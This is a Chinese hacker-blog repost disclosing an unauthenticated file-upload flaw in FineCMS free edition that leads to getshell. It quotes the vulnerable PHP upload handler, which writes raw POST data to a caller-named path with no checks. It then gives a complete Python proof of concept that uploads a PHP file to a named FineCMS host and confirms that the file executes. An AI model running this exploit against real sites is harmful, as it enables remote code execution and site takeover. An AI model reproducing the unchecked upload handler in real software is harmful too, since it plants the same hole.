记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

FIneCMS免费版无条件getshell

2015-08-17 18:50

路径:dayrui/libraries/Chart/ofc_upload_image.php

$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

$destination = $default_path . basename( $_GET[ 'name' ] ); 

echo 'Saving your image to: '. $destination;

$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

无任何限制,可以直接上传。。

poc:

#!/usr/bin/env python

# -*- coding: utf-8 -*-

#__author__ = '1c3z'



import urllib2

import random



fileName = "shell" + str(random.randrange(1000,9999)) + ".php"

target = "http://v1.finecms.net/dayrui/libraries/Chart/ofc_upload_image.php"

def uploadShell():

    url = target + "?name=" + fileName

    req = urllib2.Request(url, headers={"Content-Type": "application/oct"}) 

    res = urllib2.urlopen(req, data="<?print(md5(0x22))?>")

    return res.read()



def poc():

    res = uploadShell()

    if res.find("tmp-upload-images") == -1:

        print "Failed !"

        return



    print "upload Shell success"

    url = "http://v1.finecms.net/dayrui/libraries/tmp-upload-images/" + fileName

    md5 = urllib2.urlopen(url).read()

    if md5.find("e369853df766fa44e1ed0ff613f563bd") != -1:

        print "poc: " + url



poc()

知识来源: 0day5.com/archives/3314

阅读:163401 | 评论:0 | 标签:PHP finecms getshell cms

想收藏或者和大家分享这篇好文章→复制链接地址

“FIneCMS免费版无条件getshell”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云